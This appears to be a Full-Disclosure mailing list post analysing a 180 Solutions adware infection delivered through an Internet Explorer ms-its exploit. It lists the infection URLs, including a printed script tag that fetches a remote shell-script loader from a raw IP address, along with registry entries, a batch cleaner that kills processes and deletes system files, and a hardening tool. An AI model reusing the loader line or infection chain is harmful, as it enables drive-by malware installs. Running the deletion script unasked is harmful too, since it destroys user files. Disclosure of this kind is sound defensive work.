180 Solutions Exploits and Toolbars Hacking Patched Users
By Rafel Ivgi, The-Insider Table Of Contents: ********************* 1. Class Name 2. Infecting Files 3. Related Registery Entries 4. Cleaner 5. Solution 6. Visit : http://theinsider.deep-ice.com 1. Class Name: iiittt Class **************************** *Comment : All actions preformed on your machine are logged in the following hidden file: C:\WINDOWS\system32\log.bak.txt Class Id : {FE1A240F-B247-4E06-A600-30E28F5AF3A0} Downloading c:\install.cab Excuting c:\install.htm 2. Infecting Files: ******************** http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=!!generate!!&partner_id=&product_id=&browser_ok=y&rnd=34&basename=msbb&SID=YJGHCHUV&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=42033152&TVM=2147352576&AVM=2084216832&FDS=1542299648&LAD=1601:1:1:0:0:0&WE=5 http://downloads.180solutions.com/keywords/kyf.258.gz to c:\windows\system32\kyf.dat http://installs.180solutions.com/downloads/boom/2.0/RBoomerang.1 to C:\WINDOWS\abolaror.exe http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=26&basename=msbb&SID=AZWDUFMF&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=49520640&TVM=2147352576&AVM=2070482944&FDS=1538985984&LAD=1601:1:1:0:0:0&WE=5 c:\windows\system32\FLEOK\msbb.exe from http://installs.180solutions.com/downloads/5.6/msbb.exe http://installs.180solutions.com/downloads/5.6/msbb.exe to c:\windows\system32\FLEOK\msbb.exe http://bis.180solutions.com/config.aspx?did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=9&basen ame=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&SID=NYBQFSPS&OS=5.1.26 00.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0. 2800.1&TPM=267890688&APM=70152192&TVM=2147352576&AVM=2070474752&FDS=15387238 40&LAD=1601:1:1:0:0:0&WE=5&TCA=0&SCA=0&MRDS=0 http://installs.180solutions.com/Downloads/DLL/3.0/ncmyb.dll to c:\windows\system32\FLEOK\ncmyb.dll http://tv.180solutions.com/showme.aspx?keyword=.tightasianass.com&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=32&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=61321216&TVM=2147352576&AVM=2051579904&FDS=1538109440&LAD=1601:1:1:0:0:0&WE=5 http://216.130.188.219/ei2/index.html http://69.42.67.154/topbucks/tp2/index.html http://216.130.188.219/ei2/installer.htm http://69.42.67.154/topbucks/tp2/index.html <SCRIPT%20SRC=\'http://216.130.188.219/ei2/shellscript_loader_js.php?ref=und efined\'></SCRIPT> http://exits.freepornpics.com/timed_exits/straight_timed_pop.htm http://216.130.188.219/ei2/index.html http://69.42.67.154/_mpbfpas/free_trial_multisite/index.html http://tv.180solutions.com/showme.aspx?keyword=trial&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=23&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=37040128&TVM=2147352576&AVM=2031108096&FDS=1536757760&LAD=1601:1:1:0:0:0&WE=5 http://exits.freepornpics.com/timed_exits/fpa_pinkpays.html http://www.i-lookup.com/index1.php 3. Related Registery Entries: ****************************** [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}] @="iiittt Class" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Control] [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories] [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}] [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InprocServer 32] @="C:\\WINDOWS\\System32\\windec32.dll" "ThreadingModel"="Apartment" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus] @="0" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus\1 ] @="131473" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ProgID] @="windec.iiittt.1" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Programmable ] [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ToolboxBitma p32] @="C:\\WINDOWS\\System32\\windec32.dll, 102" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\TypeLib] @="{660B38CB-6349-4C67-A418-AADABAE09C38}" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Version] @="1.0" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\VersionIndep endentProgID] @="windec.iiittt" [HKEY_CLASSES_ROOT\windec.iiittt] @="iiittt Class" [HKEY_CLASSES_ROOT\windec.iiittt\CLSID] @="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}" [HKEY_CLASSES_ROOT\windec.iiittt\CurVer] @="windec.iiittt.1" [HKEY_CLASSES_ROOT\windec.iiittt.1] @="iiittt Class" [HKEY_CLASSES_ROOT\windec.iiittt.1\CLSID] @="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}] "SystemComponent"=dword:00000000 "Installer"="MSICD" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains\Files] "C:\\WINDOWS\\System32\\windec32.dll"="" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\DownloadInformation] "CODEBASE"="file://C:\\install.cab" "INF"="C:\\WINDOWS\\Downloaded Program Files\\windec32.inf" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InstalledVersion] @="2,0,0,0" 4. Cleaner: ************* Filename=180killer.bat: -------------------------------------------CUT ERE ------------------------------------------------- taskkill /f /im iexplore.exe taskkill /f /im explorer.exe taskkill /f /im dllhost.exe del c:\install.htm del c:\install.cab taskkill /f /im abolaror.exe del C:\WINDOWS\abolaror.exe taskkill /f /im msbb.exe del c:\windows\system32\FLEOK\msbb.exe taskkill /f /im apconaj.exe del c:\windows\system32\apconaj.exe taskkill /f /im alchem.exe del c:\windows\alchem.exe rmdir /s /q c:\windows\system32\FLEOK rmdir /s /q c:\windows\sbnet del C:\WINDOWS\System32\windec32.dll explorer.exe reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v ShowBehind /f reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v msbb /f reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v abolaror /f reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v chiqarsfneg /f reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v alchem /f -------------------------------------------CUT ERE ------------------------------------------------- 5. Solution: ************* The excution of this Internet Exploerer exploit was caused by ms-its[Even Patched]. The ms-its protocol is not needed for windows normal operations, therefore it should be removed. XPLizer - Windows Hardning Frontend Tool - Updated for removing ms-its protocol. http://www.securiteam.com/tools/5EP081FCKI.html The sources of XPLizer can be found at http://theinsider.deep-ice.com/xplizer-src.zip An executable version can be found at http://theinsider.deep-ice.com/xplizer.zip The official readme file for XPLizer can be found at http://theinsider.deep-ice.com/readme.txt _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html